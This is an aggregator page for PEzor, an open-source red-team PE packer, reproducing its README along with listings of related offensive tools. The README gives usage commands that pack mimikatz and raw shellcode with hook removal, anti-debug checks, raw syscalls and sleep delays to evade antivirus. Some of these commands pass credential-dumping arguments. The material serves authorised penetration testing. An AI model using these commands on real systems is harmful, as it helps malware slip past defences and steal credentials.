phra / Pezor
Licence: gpl-3.0
Open-Source PE Packer
Stars: ✭ 561
Projects that are alternatives of or similar to Pezor
Malwless
Test Blue Team detections without running any attack.
Stars: ✭ 215 (-61.68%)
Mutual labels: hacktoberfest, redteam
Foureye
AV Evasion Tool For Red Team Ops
Stars: ✭ 421 (-24.96%)
Mutual labels: redteam, antivirus-evasion
DNSWho
transmit cs beacon (shellcode) over self-made dns to avoid anti-kill and AV
Stars: ✭ 47 (-91.62%)
Mutual labels: antivirus-evasion, redteam
Payloadsallthethings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Stars: ✭ 32,909 (+5766.13%)
Mutual labels: hacktoberfest, redteam
Do Agent
Collects system metrics from DigitalOcean Droplets
Stars: ✭ 552 (-1.6%)
Mutual labels: hacktoberfest
Cockpit
Add content management functionality to any site - plug & play / headless / api-first CMS
Stars: ✭ 5,173 (+822.1%)
Mutual labels: hacktoberfest
Ramda Adjunct
Ramda Adjunct is the most popular and most comprehensive set of functional utilities for use with Ramda, providing a variety of useful, well tested functions with excellent documentation.
Stars: ✭ 550 (-1.96%)
Mutual labels: hacktoberfest
Mycroft Core
Mycroft Core, the Mycroft Artificial Intelligence platform.
Stars: ✭ 5,489 (+878.43%)
Mutual labels: hacktoberfest
Hello World
Hello World in all possible programmnig languages
Stars: ✭ 558 (-0.53%)
Mutual labels: hacktoberfest
Theharvester
E-mails, subdomains and names Harvester - OSINT
Stars: ✭ 6,175 (+1000.71%)
Mutual labels: redteam
React Packages
Meteor packages for a great React developer experience
Stars: ✭ 551 (-1.78%)
Mutual labels: hacktoberfest
Nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Stars: ✭ 5,943 (+959.36%)
Mutual labels: redteam
Flask Googlemaps
Easy way to add GoogleMaps to Flask applications. maintainer: @RiverFount
Stars: ✭ 550 (-1.96%)
Mutual labels: hacktoberfest
Pushbullet.py
A python client for http://pushbullet.com
Stars: ✭ 555 (-1.07%)
Mutual labels: hacktoberfest
Cataclysm Dda
Cataclysm - Dark Days Ahead. A turn-based survival game set in a post-apocalyptic world.
Stars: ✭ 5,894 (+950.62%)
Mutual labels: hacktoberfest
Meteor User Status
Track user connection state and inactivity in Meteor.
Stars: ✭ 555 (-1.07%)
Mutual labels: hacktoberfest
PEzor
Read the blog posts here:
- https://iwantmore.pizza/posts/PEzor.html
- https://iwantmore.pizza/posts/PEzor2.html
- https://iwantmore.pizza/posts/PEzor3.html
________________
< PEzor!! v2.1.0 >
----------------
\ / \ //\
\ |\___/| / \// \\
/0 0 \__ / // | \ \
/ / \/_/ // | \ \
@_^[email protected]'/ \/_ // | \ \
//_^_/ \/_ // | \ \
( //) | \/// | \ \
( / /) _|_ / ) // | \ _\
( // /) '/,_ _ _/ ( ; -. | _ _\.-~ .-~~~^-.
(( / / )) ,-{ _ `-.|.-~-. .~ `.
(( // / )) '/\ / ~-. _ .-~ .-~^-. \
(( /// )) `. { } / \ \
(( / )) .----~-.\ \-' .~ \ `. \^-.
///.----..> \ _ -~ `. ^-` ^-_
///-._ _ _ _ _ _ _}^ - - - - ~ ~-- ,.-~
/.-~
---------------------------------------------------------------------------
Installation
The install.sh
is designed to work on a Kali Linux distro.
$ git clone https://github.com/phra/PEzor.git
$ cd PEzor
$ sudo bash install.sh
$ bash PEzor.sh -h
Usage
PEzor help
display help for PEzor
USAGE
$ PEzor help
PEzor <EXECUTABLE>
Pack the provided executable into a new one
USAGE
$ PEzor [options...] <EXECUTABLE> [donut args...]
# PEzor [options...] <EXECUTABLE> [donut args...]
OPTIONS
-h Show usage and exits
-32 Force 32-bit executable
-64 Force 64-bit executable
-debug Generate a debug build
-unhook User-land hooks removal
-antidebug Add anti-debug checks
-syscalls Use raw syscalls [64-bit only] [Windows 10 only]
-sgn Encode the generated shellcode with sgn
-text Store shellcode in .text section instead of .data
-rx Allocate RX memory for shellcode
-self Execute the shellcode in the same thread
-sdk=VERSION Use specified .NET Framework version (2, 4, 4.5 (default))
-sleep=N Sleeps for N seconds before unpacking the shellcode
-format=FORMAT Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
[donut args...] After the executable to pack, you can pass additional Donut args, such as -z 2
EXAMPLES
# 64-bit (self-inject RWX)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/x64/mimikatz.exe -z 2
# 64-bit (self-inject RX)
$ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 mimikatz/x64/mimikatz.exe -z 2
# 64-bit (raw syscalls)
$ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2
# 64-bit (reflective dll)
$ PEzor.sh -format=reflective-dll mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
# 64-bit (service exe)
$ PEzor.sh -format=service-exe mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
# 64-bit (service dll)
$ PEzor.sh -format=service-dll mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
# 64-bit (dotnet)
$ PEzor.sh -format=dotnet -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
# 64-bit (dotnet-pinvoke)
$ PEzor.sh -format=dotnet-pinvoke -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
# 64-bit (dotnet-createsection)
$ PEzor.sh -format=dotnet-createsection -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
# 32-bit (self-inject)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
# 32-bit (Win32 API: VirtualAlloc/WriteMemoryProcess/CreateRemoteThread)
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
# 32-bit (Win32 API: VirtualAlloc/WriteMemoryProcess/CreateRemoteThread) and arguments for donut
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2 "-plsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv"
PEzor <SHELLCODE>
Pack the provided shellcode into an executable
USAGE
$ PEzor <-32|-64> [options...] <SHELLCODE>
OPTIONS
-h Show usage and exits
-32 Force 32-bit executable
-64 Force 64-bit executable
-debug Generate a debug build
-unhook User-land hooks removal
-antidebug Add anti-debug checks
-syscalls Use raw syscalls [64-bit only] [Windows 10 only]
-sgn Encode the provided shellcode with sgn
-text Store shellcode in .text section instead of .data
-rx Allocate RX memory for shellcode
-self Execute the shellcode in the same thread [requires RX shellcode, not compatible with -sgn]
-sleep=N Sleeps for N seconds before unpacking the shellcode
-format=FORMAT Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
EXAMPLES
# 64-bit (self-inject RWX)
$ PEzor.sh shellcode.bin
# 64-bit (self-inject RX)
$ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 shellcode.bin
# 64-bit (self-inject)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 shellcode.bin
# 64-bit (raw syscalls)
$ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 shellcode.bin
# 64-bit (reflective dll)
$ PEzor.sh -format=reflective-dll shellcode.bin
# 64-bit (service exe)
$ PEzor.sh -format=service-exe shellcode.bin
# 64-bit (service dll)
$ PEzor.sh -format=service-dll shellcode.bin
# 64-bit (dotnet)
$ PEzor.sh -format=dotnet shellcode.bin
# 64-bit (dotnet-pinvoke)
$ PEzor.sh -format=dotnet-pinvoke shellcode.bin
# 64-bit (dotnet-createsection)
$ PEzor.sh -format=dotnet-createsection shellcode.bin
# 32-bit (self-inject)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 shellcode.bin
# 32-bit (Win32 API: VirtualAlloc/WriteMemoryProcess/CreateRemoteThread)
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 shellcode.bin'
See code: PEzor.sh
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].